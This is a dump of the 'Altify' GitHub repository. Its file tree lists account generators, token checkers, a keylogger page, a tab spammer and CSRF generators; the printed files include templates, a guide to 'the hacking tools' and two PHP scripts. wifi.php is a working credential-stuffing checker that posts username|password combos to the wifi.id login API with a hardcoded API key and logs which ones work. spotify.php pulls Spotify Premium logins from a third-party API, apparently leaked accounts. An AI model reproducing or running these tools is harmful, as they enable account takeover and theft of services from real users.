├── .github ├── FUNDING.yml ├── ISSUE_TEMPLATE │ ├── bug_report.md │ ├── collaboration-request.md │ ├── feature-request.md │ └── issue-template.md └── PULL_REQUEST_TEMPLATE │ └── pull_request_template.md ├── 404.html ├── BingSiteAuth.xml ├── CITATION.md ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── CSRF ├── CSRF.gif └── X-CSRF-GEN.html ├── GUIDE.md ├── LICENSE ├── README.md ├── SECURITY.md ├── Tools ├── CSharp │ ├── Discord-Nitro-QR-master.zip │ ├── FraftSpotifyGen-master.zip │ ├── Nike-Account-Generator-written-in-Csharp-main.zip │ ├── OutlookAccountGenerator-master.zip │ ├── Shopify-Account-Generator-master.zip │ ├── Steam-Account-Creator-master.zip │ ├── TheAltening-Account-Generator-master.zip │ ├── TwitterAccountGenerator-master.zip │ ├── fluffy-disco-main.zip │ └── instagram-account-creator-master.zip ├── Discord-Account-Generator-main.zip ├── HTBC │ └── Hacking-tools-main.zip ├── Java │ ├── InstagramAccountGenerator-master.zip │ ├── RuneScape-Account-Generator-master.zip │ └── steam-gen-master.zip ├── JavaScript │ └── account-generator-master.zip ├── PHP │ ├── Genshin-Impact-Account-Generator-main.zip │ ├── Spotify │ │ └── spotify.php │ ├── WifiID │ │ ├── list.txt │ │ └── wifi.php │ ├── cpanel-email-generator-master.zip │ ├── csvGenerator4ScratchAccount-master.zip │ └── twitter-account-generator-master.zip ├── PyChecker │ ├── online.py │ ├── static (7).png │ ├── static (8).png │ └── tokens.txt ├── PyTokenJoiner │ ├── joiner.py │ └── tokens.txt └── TwitchAccGen │ ├── TwitchAccountCreator-main.zip │ ├── config │ └── config.json │ ├── main.py │ ├── out │ ├── tokenInfo.txt │ └── tokens.txt │ └── requirements.txt ├── cleb ├── csrf.js └── csrf.src.html ├── css ├── style.css ├── style2.css ├── style3.css ├── style4.css └── style5.css ├── favicon.ico ├── googlec1598d5019954416.html ├── html ├── AJAX │ ├── AutoRef.js │ ├── AutoUpdate.html │ ├── HTTP.html │ ├── S4_loader.js │ ├── S5_loader.js │ ├── SOCKS4.html │ ├── SOCKS5.html │ ├── counter.js │ ├── http_loader.js │ ├── img │ │ ├── AltifyPrxGen.gif │ │ ├── cybernews.png │ │ ├── haveibeenpwned.png │ │ └── refresh.png │ ├── info.html │ ├── lister.js │ ├── obfuscatedlister.js │ ├── style.css │ ├── visitorcountautoupdate.html │ └── vs.html ├── Bibliography-Formatting-Tool.html ├── Bibliography-Formatting-Tool │ └── POST.html ├── CSharpToolsOnly.html ├── DownloadFile.js ├── JavaScriptToolsOnly.html ├── JavaToolsOnly.html ├── NEW_TOOLS │ ├── ProxyGen.html │ ├── TRIG_CALC │ │ ├── PR.TrigCalc.gif │ │ ├── YT.Calc.gif │ │ ├── calculator.html │ │ ├── detailed.html │ │ ├── examples.html │ │ ├── f.html │ │ ├── getresults.html │ │ └── js │ │ │ └── _1.js │ ├── calculators │ │ ├── heat_flow │ │ │ ├── calculate.html │ │ │ ├── results.html │ │ │ └── update.js │ │ └── money │ │ │ ├── calculator.html │ │ │ ├── results.html │ │ │ └── update.js │ ├── resc │ │ ├── http.html │ │ ├── js │ │ │ └── httpgen.js │ │ ├── urlread1.js │ │ ├── urlread2.js │ │ ├── urlread3.js │ │ ├── urlread4.js │ │ ├── urlread5.js │ │ └── urlread6.js │ ├── tempmailcomposer │ │ └── test.html │ └── w10 │ │ ├── generator.html │ │ ├── scr.js │ │ └── w10.gif ├── NewTab409.html ├── OAG │ ├── AIO.src │ ├── AIO_COMBO.html │ ├── AIO_PLAIN.html │ ├── AIO_PLAIN.src.html │ ├── OAG.html │ ├── Resources │ │ ├── FN.txt │ │ ├── LS.txt │ │ ├── States │ │ │ ├── Mexico.txt │ │ │ └── USA.txt │ │ ├── Types │ │ │ └── ACCS.txt │ │ ├── email_endings.txt │ │ └── special_character.txt │ ├── autocirculation.js │ ├── csrf.js │ ├── img │ │ ├── AltifyOAG.gif │ │ └── refresh.png │ └── style.css ├── PHPToolsOnly.html ├── PythonToolsOnly.html ├── ResponseTest.html ├── ResponsiveKeyLogger │ ├── Example.gif │ └── info.html ├── TabSpammer.html ├── ToS.html ├── ToolsToDownload.html ├── calculator │ ├── calc.html │ └── style.css ├── csrf.js ├── games │ └── drop-the-number-game │ │ ├── 1.html │ │ ├── 4.html │ │ ├── cdn-cgi │ │ └── scripts │ │ │ └── 7d0fa10a │ │ │ └── cloudflare-static │ │ │ └── rocket-loader.min.js │ │ ├── data.json │ │ ├── icons │ │ ├── a │ │ ├── icon-128.png │ │ ├── icon-256.png │ │ ├── icon-512.png │ │ └── loading-logo.png │ │ ├── images │ │ ├── a │ │ ├── doubleeffect-sheet0.png │ │ ├── shared-0-sheet0.png │ │ └── shared-0-sheet1.png │ │ ├── index.html │ │ ├── media │ │ ├── a │ │ ├── drop.webm │ │ └── merge.webm │ │ ├── more.html │ │ ├── scripts │ │ ├── a │ │ ├── c3runtime.js │ │ ├── c3runtime1.js │ │ ├── c3runtime4.js │ │ ├── c3runtimem.js │ │ ├── dispatchworker.js │ │ ├── jobworker.js │ │ ├── main.js │ │ ├── main1.js │ │ ├── main4.js │ │ ├── mainm.js │ │ ├── offlineclient.js │ │ ├── register-sw.js │ │ └── supportcheck.js │ │ ├── style.css │ │ ├── sw.js │ │ └── workermain.js ├── log.html ├── postmailinboxes.txt ├── postmailkeys.txt ├── rap.txt └── socks4.txt ├── img ├── Altify.ico ├── Asset 860.png ├── Asset 870.png ├── Pastebin.gif ├── StatsGenQR.png ├── charts.png ├── config.png ├── email-campaign.png ├── favicon-0.png ├── footer-background.png ├── fpc.gif ├── frame.png ├── githuberror-52422.png ├── graphic.png ├── graphs.png ├── logo-main.png ├── logo-sub-1.png ├── logo-sub-2.png ├── logo-sub-3.png ├── logo-sub-4.png ├── logo.svg ├── online-campaign.png ├── process.png ├── social.png ├── standard.gif ├── team1.png ├── team2.png └── team3.png ├── index.html ├── js ├── counter.js ├── csrf.js ├── login.js ├── read.plugin.js ├── redirect.js ├── smooth-scroll.js └── urlcheck.js ├── netlify └── functions │ └── netlify.toml ├── robots.txt ├── sign-in.html └── sitemap.xml /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | custom: https://paypal.me/Z3K3GamingYT 4 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve and fix any bugs in our coding 4 | title: Bug Report 5 | labels: bug 6 | assignees: Altify-Development 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | ![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+R)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+E)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+Q)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+U)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+I)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+R)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+E)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+D) 12 | 13 | A clear and concise description of what the bug is. 14 | 15 | **To Reproduce** 16 | ![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+R)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+E)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+Q)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+U)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+I)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+R)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+E)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+D) 17 | 18 | Steps to reproduce the behavior: 19 | ![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+R)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+E)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+Q)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+U)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+I)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+R)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+E)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+D) 20 | 21 | 1. Go to '...' 22 | 2. Click on '....' 23 | 3. Scroll down to '....' 24 | 4. See error 25 | 26 | **Expected behavior** 27 | A clear and concise description of what you expected to happen. 28 | 29 | **Screenshots** 30 | If applicable, add screenshots to help explain your problem. 31 | 32 | **Desktop (please complete the following information):** 33 | ![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+R)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+E)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+Q)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+U)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+I)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+R)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+E)![#f03c15](https://via.placeholder.com/15/f03c15/000000?text=+D) 34 | 35 | - OS: [e.g. iOS] 36 | - Browser [e.g. chrome, safari] 37 | - Version [e.g. 22] 38 | 39 | **Smartphone (please complete the following information):** 40 | - Device: [e.g. iPhone6] 41 | - OS: [e.g. iOS8.1] 42 | - Browser [e.g. stock browser, safari] 43 | - Version [e.g. 22] 44 | 45 | **Additional context** 46 | Add any other context about the problem here. 47 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/collaboration-request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Collaboration Request 3 | about: Fill in the blanks if you are interested in joining the organization or want 4 | to help improve it. 5 | title: Collaboration Req 6 | labels: '' 7 | assignees: Altify-Development 8 | 9 | --- 10 | 11 | 1. What is your interest in the organization? 12 | 13 | 2. What can you offer? 14 | 15 | 3. How can we contact you? 16 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature-request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature Request 3 | about: Suggest an idea for this project 4 | title: Feature Request 5 | labels: enhancement 6 | assignees: Altify-Development 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/issue-template.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Issue Template 3 | about: Describe this issue template's purpose here. 4 | title: Bug 5 | labels: bug, help wanted, invalid, question 6 | assignees: Altify-Development 7 | 8 | --- 9 | 10 | Issue tracker is **ONLY** used for reporting bugs. New features should be discussed on our slack channel. Please use [stackoverflow](https://stackoverflow.com) for supporting issues. 11 | 12 | 13 | 14 | ## Expected Behavior 15 | 16 | 17 | ## Current Behavior 18 | 19 | 20 | ## Possible Solution 21 | 22 | 23 | ## Steps to Reproduce 24 | 25 | 26 | 1. 27 | 2. 28 | 3. 29 | 4. 30 | 31 | ## Context (Environment) 32 | 33 | 34 | 35 | 36 | 37 | ## Detailed Description 38 | 39 | 40 | ## Possible Implementation 41 | 42 | -------------------------------------------------------------------------------- /.github/PULL_REQUEST_TEMPLATE/pull_request_template.md: -------------------------------------------------------------------------------- 1 | Fixes # 2 | 3 | ## Proposed Changes 4 | 5 | - 6 | - 7 | - 8 | -------------------------------------------------------------------------------- /404.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Altify | 404 Page Not Found 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 27 | 28 | 29 | 30 |
31 |
32 | 33 |
34 |
35 | 38 |
39 |
40 | 43 |
44 |
45 | 46 |
47 | 48 |
49 |
50 | 51 | 52 |
53 |
54 | 55 |

U FOUND THE WRONG PAGE RUH

56 | 57 | -------------------------------------------------------------------------------- /BingSiteAuth.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4CEA3A5E8030C3BE543E880766463233 4 | -------------------------------------------------------------------------------- /CITATION.md: -------------------------------------------------------------------------------- 1 | `html` 2 | ```html 3 | 4 | ``` 5 | `js` 6 | ```javascript 7 | /* Origional Code From Altify */ 8 | ``` 9 | `ahk` *( insert in beginning of script before compiling )* 10 | ```autohotkey 11 | /*@Ahk2Exe-Keep 12 | Menu, Tray, Add 13 | Menu, Tray, Add, Credits 14 | Credits: 15 | MsgBox Partial credit to Altify. 16 | return 17 | */ 18 | ``` 19 | `py` 20 | ```python 21 | # Code used from Altify 22 | ``` 23 | `c#` 24 | ```c# 25 | // Code used from Altify 26 | ``` 27 | `c++` 28 | ```c++ 29 | // Code used from Altify 30 | ``` 31 | `php` 32 | ```php 33 | // Code used from Altify 34 | ``` 35 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | We as members, contributors, and leaders pledge to make participation in our 6 | community a harassment-free experience for everyone, regardless of age, body 7 | size, visible or invisible disability, ethnicity, sex characteristics, gender 8 | identity and expression, level of experience, education, socio-economic status, 9 | nationality, personal appearance, race, religion, or sexual identity 10 | and orientation. 11 | 12 | We pledge to act and interact in ways that contribute to an open, welcoming, 13 | diverse, inclusive, and healthy community. 14 | 15 | ## Our Standards 16 | 17 | Examples of behavior that contributes to a positive environment for our 18 | community include: 19 | 20 | * Demonstrating empathy and kindness toward other people 21 | * Being respectful of differing opinions, viewpoints, and experiences 22 | * Giving and gracefully accepting constructive feedback 23 | * Accepting responsibility and apologizing to those affected by our mistakes, 24 | and learning from the experience 25 | * Focusing on what is best not just for us as individuals, but for the 26 | overall community 27 | 28 | Examples of unacceptable behavior include: 29 | 30 | * The use of sexualized language or imagery, and sexual attention or 31 | advances of any kind 32 | * Trolling, insulting or derogatory comments, and personal or political attacks 33 | * Public or private harassment 34 | * Publishing others' private information, such as a physical or email 35 | address, without their explicit permission 36 | * Other conduct which could reasonably be considered inappropriate in a 37 | professional setting 38 | 39 | ## Enforcement Responsibilities 40 | 41 | Community leaders are responsible for clarifying and enforcing our standards of 42 | acceptable behavior and will take appropriate and fair corrective action in 43 | response to any behavior that they deem inappropriate, threatening, offensive, 44 | or harmful. 45 | 46 | Community leaders have the right and responsibility to remove, edit, or reject 47 | comments, commits, code, wiki edits, issues, and other contributions that are 48 | not aligned to this Code of Conduct, and will communicate reasons for moderation 49 | decisions when appropriate. 50 | 51 | ## Scope 52 | 53 | This Code of Conduct applies within all community spaces, and also applies when 54 | an individual is officially representing the community in public spaces. 55 | Examples of representing our community include using an official e-mail address, 56 | posting via an official social media account, or acting as an appointed 57 | representative at an online or offline event. 58 | 59 | ## Enforcement 60 | 61 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 62 | reported to the community leaders responsible for enforcement at 63 | abuse@psnator.com. 64 | All complaints will be reviewed and investigated promptly and fairly. 65 | 66 | All community leaders are obligated to respect the privacy and security of the 67 | reporter of any incident. 68 | 69 | ## Enforcement Guidelines 70 | 71 | Community leaders will follow these Community Impact Guidelines in determining 72 | the consequences for any action they deem in violation of this Code of Conduct: 73 | 74 | ### 1. Correction 75 | 76 | **Community Impact**: Use of inappropriate language or other behavior deemed 77 | unprofessional or unwelcome in the community. 78 | 79 | **Consequence**: A private, written warning from community leaders, providing 80 | clarity around the nature of the violation and an explanation of why the 81 | behavior was inappropriate. A public apology may be requested. 82 | 83 | ### 2. Warning 84 | 85 | **Community Impact**: A violation through a single incident or series 86 | of actions. 87 | 88 | **Consequence**: A warning with consequences for continued behavior. No 89 | interaction with the people involved, including unsolicited interaction with 90 | those enforcing the Code of Conduct, for a specified period of time. This 91 | includes avoiding interactions in community spaces as well as external channels 92 | like social media. Violating these terms may lead to a temporary or 93 | permanent ban. 94 | 95 | ### 3. Temporary Ban 96 | 97 | **Community Impact**: A serious violation of community standards, including 98 | sustained inappropriate behavior. 99 | 100 | **Consequence**: A temporary ban from any sort of interaction or public 101 | communication with the community for a specified period of time. No public or 102 | private interaction with the people involved, including unsolicited interaction 103 | with those enforcing the Code of Conduct, is allowed during this period. 104 | Violating these terms may lead to a permanent ban. 105 | 106 | ### 4. Permanent Ban 107 | 108 | **Community Impact**: Demonstrating a pattern of violation of community 109 | standards, including sustained inappropriate behavior, harassment of an 110 | individual, or aggression toward or disparagement of classes of individuals. 111 | 112 | **Consequence**: A permanent ban from any sort of public interaction within 113 | the community. 114 | 115 | ## Attribution 116 | 117 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], 118 | version 2.0, available at 119 | https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. 120 | 121 | Community Impact Guidelines were inspired by [Mozilla's code of conduct 122 | enforcement ladder](https://github.com/mozilla/diversity). 123 | 124 | [homepage]: https://www.contributor-covenant.org 125 | 126 | For answers to common questions about this code of conduct, see the FAQ at 127 | https://www.contributor-covenant.org/faq. Translations are available at 128 | https://www.contributor-covenant.org/translations. 129 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # How To Contribute 2 | ### To contribute, please send a email from the template 3 | 4 | #### [template](mailto:admin@psnator.com?subject=Report%3A%20Contributing%20%5B%20DEFAULT%20%5D&body=Hey%20Altify%2C%0D%0A%0D%0AI%20would%20like%20to%20help%20in%20your%20(%20user-input%20).%20Also%2C%20you%20can%20contact%20me%20from%20this%20email%20or%20phone%20number%3A%20(%20user-input%20).%0D%0A%0D%0AFrom%2C%20(%20user-input%20)) 5 | 6 | 7 | 8 | ## Thanks, Altify Developing 9 | -------------------------------------------------------------------------------- /CSRF/CSRF.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/CSRF/CSRF.gif -------------------------------------------------------------------------------- /GUIDE.md: -------------------------------------------------------------------------------- 1 | ## You MUST READ THIS 2 | ##### (if you want to use the hacking tools successfully) 3 | 4 | ## YOU HAVE TO ENABLE JAVASCRIPT 5 | Google Chrome [Enabling JavaScript](https://www.youtube.com/watch?v=fL1B2k9T9tk) 6 | 7 |

Enable JavaScript in Safari

8 | Launch Safari from your desktop or Dock. 9 | From the main menu at the top of your screen, click Safari and then Preferences… 10 | Click the Security icon. 11 | In the Web content section, ensure that the Enable JavaScript check box has been checked. 12 | Close this window. 13 | 14 | ## POP UPS AND REDIRECTS 15 |

IF YOU WANT TO USE THE AUTO CIRCULATION METHOD OF GENERATION AND AUTO CHECKING, YOU HAVE TO ALLOW PopUps, ReDirects, Ads, Background sync, and Window placement.

16 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Altify, LLC 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | # Security Policy 2 | 3 | ## Supported Versions 4 | 5 | | Version | Supported | 6 | | ------- | ------------------ | 7 | | latest | :white_check_mark: | 8 | | < v1.2.0.7 | :x: | 9 | 10 | ## Reporting a Vulnerability 11 | 12 | Send a email to my inbox 13 | 14 | Fill out the areas that are in ( user-input ) 15 | 16 | Templates: 17 | 18 | [Default](mailto:admin@psnator.com?cc=altify@mail.com&?subject=Report%3A%20Vulnerability%20%5B%20DEFAULT%20%5D&body=Hey%20Altify%2C%0D%0A%0D%0AI%20would%20like%20to%20inform%20you%20that%20there%20is%20a%20vulnerability%20in%20your%20(%20user-input%20).%20Also%2C%20you%20can%20contact%20me%20from%20this%20email%20or%20phone%20number%3A%20(%20user-input%20).%0D%0A%0D%0AFrom%2C%20(%20user-input%20)) 19 | 20 | [InDepth](mailto:admin@psnator.com?cc=altify@mail.com&?subject=Report%3A%20Vulnerability%20%5B%20IN-DEPTH%20%5D&body=Hey%20Altify%2C%0D%0A%0D%0AI%20would%20like%20to%20inform%20you%20that%20there%20is%20a%20vulnerability%20in%20your%20(%20user-input%20).%20Also%2C%20you%20can%20contact%20me%20from%20this%20email%20or%20phone%20number%3A%20(%20user-input%20).%0D%0A%0D%0AIn-Depth%20Version%20%5B%20OPTIONAL%20%5D%3A%20(%20user-input%20)%0D%0A%0D%0AFrom%2C%20(%20user-input%20)) 21 | 22 | ### Thank you for using Altify Developing 23 | -------------------------------------------------------------------------------- /Tools/CSharp/Discord-Nitro-QR-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/CSharp/Discord-Nitro-QR-master.zip -------------------------------------------------------------------------------- /Tools/CSharp/FraftSpotifyGen-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/CSharp/FraftSpotifyGen-master.zip -------------------------------------------------------------------------------- /Tools/CSharp/Nike-Account-Generator-written-in-Csharp-main.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/CSharp/Nike-Account-Generator-written-in-Csharp-main.zip -------------------------------------------------------------------------------- /Tools/CSharp/OutlookAccountGenerator-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/CSharp/OutlookAccountGenerator-master.zip -------------------------------------------------------------------------------- /Tools/CSharp/Shopify-Account-Generator-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/CSharp/Shopify-Account-Generator-master.zip -------------------------------------------------------------------------------- /Tools/CSharp/Steam-Account-Creator-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/CSharp/Steam-Account-Creator-master.zip -------------------------------------------------------------------------------- /Tools/CSharp/TheAltening-Account-Generator-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/CSharp/TheAltening-Account-Generator-master.zip -------------------------------------------------------------------------------- /Tools/CSharp/TwitterAccountGenerator-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/CSharp/TwitterAccountGenerator-master.zip -------------------------------------------------------------------------------- /Tools/CSharp/fluffy-disco-main.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/CSharp/fluffy-disco-main.zip -------------------------------------------------------------------------------- /Tools/CSharp/instagram-account-creator-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/CSharp/instagram-account-creator-master.zip -------------------------------------------------------------------------------- /Tools/Discord-Account-Generator-main.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/Discord-Account-Generator-main.zip -------------------------------------------------------------------------------- /Tools/HTBC/Hacking-tools-main.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/HTBC/Hacking-tools-main.zip -------------------------------------------------------------------------------- /Tools/Java/InstagramAccountGenerator-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/Java/InstagramAccountGenerator-master.zip -------------------------------------------------------------------------------- /Tools/Java/RuneScape-Account-Generator-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/Java/RuneScape-Account-Generator-master.zip -------------------------------------------------------------------------------- /Tools/Java/steam-gen-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/Java/steam-gen-master.zip -------------------------------------------------------------------------------- /Tools/JavaScript/account-generator-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/JavaScript/account-generator-master.zip -------------------------------------------------------------------------------- /Tools/PHP/Genshin-Impact-Account-Generator-main.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/PHP/Genshin-Impact-Account-Generator-main.zip -------------------------------------------------------------------------------- /Tools/PHP/Spotify/spotify.php: -------------------------------------------------------------------------------- 1 | $white Let's generate some$okegreen Spotify Premium$white Account\n"; 18 | print "\n"; 19 | print "$okegreen ??$white Total : "; 20 | $jumlah = trim(fgets(STDIN)); 21 | print "\n"; 22 | print "$red //$white Generating $jumlah Account\n"; 23 | print "\n"; 24 | $result = file_get_contents('http://n1ghthax0r.000webhostapp.com/api/spotify/?jumlah='.$jumlah); 25 | $json = json_decode($result, true); 26 | foreach ((array) $json as $row){ 27 | $country = $row['Country']; 28 | $type = $row['Account Type']; 29 | $email = $row['Email']; 30 | $pass = $row['Password']; 31 | $exp = $row['Expired']; 32 | print "$okegreen **$white Type : $type\n"; 33 | print "$okegreen **$white Email : $email\n"; 34 | print "$okegreen **$white Pass : $pass\n"; 35 | print "$okegreen **$white Country : $country \n"; 36 | if ($exp == ''){ 37 | print "\n"; 38 | } 39 | else{ 40 | print "$okegreen **$white Expired : $exp\n"; 41 | print "\n"; 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /Tools/PHP/WifiID/list.txt: -------------------------------------------------------------------------------- 1 | account1@gmail.com|password1 2 | account2@gmail.com|password2 3 | account3@gmail.com|password3 4 | -------------------------------------------------------------------------------- /Tools/PHP/WifiID/wifi.php: -------------------------------------------------------------------------------- 1 | $data) { 62 | $split = explode("|", $data); 63 | $user = trim($split[0]); 64 | $pass = trim($split[1]); 65 | $ch = curl_init(); 66 | curl_setopt($ch, CURLOPT_URL, 'https://caramel.wifi.id/api/ott/v2'); 67 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 68 | curl_setopt($ch, CURLOPT_POST, 1); 69 | curl_setopt($ch, CURLOPT_POSTFIELDS, "{\"password\":\"$pass\",\"username\":\"$user\"}"); 70 | curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate'); 71 | $headers = array(); 72 | $headers[] = 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0'; 73 | $headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; 74 | $headers[] = 'Accept-Language: en-US,en;q=0.5'; 75 | $headers[] = 'Content-Type: application/x-www-form-urlencoded'; 76 | $headers[] = 'X-Api-Key: 8d446f02-ef8d-47b2-9663-dbe75b016fb9'; 77 | $headers[] = 'Connection: keep-alive'; 78 | $headers[] = 'Upgrade-Insecure-Requests: 1'; 79 | $headers[] = 'Cache-Control: max-age=0, no-cache'; 80 | $headers[] = 'Pragma: no-cache'; 81 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 82 | $result = curl_exec($ch); 83 | curl_close($ch); 84 | $json = json_decode($result); 85 | $act = $json->act; 86 | $exp = $json->expire; 87 | // $amount = $json->amount; 88 | $duration = $json->duration; 89 | // $hour = $json->hour; 90 | if ($act == "INVALID") { 91 | echo "$red //$white DIE!$yellow ->$white $user|$pass \n"; 92 | fwrite(fopen("die.txt", "a"), "$user|$pass \n"); 93 | }else{ 94 | echo "$okegreen //$white LIVE until $exp$yellow ->$white $user|$pass \n"; 95 | fwrite(fopen("live.txt", "a"), "username: $user, password: $pass, Masa aktif $duration hari, hingga $exp WIB. CS:147 \n"); 96 | } 97 | sleep(1); 98 | } 99 | echo "\n"; 100 | 101 | ?> 102 | -------------------------------------------------------------------------------- /Tools/PHP/cpanel-email-generator-master.zip: -------------------------------------------------------------------------------- 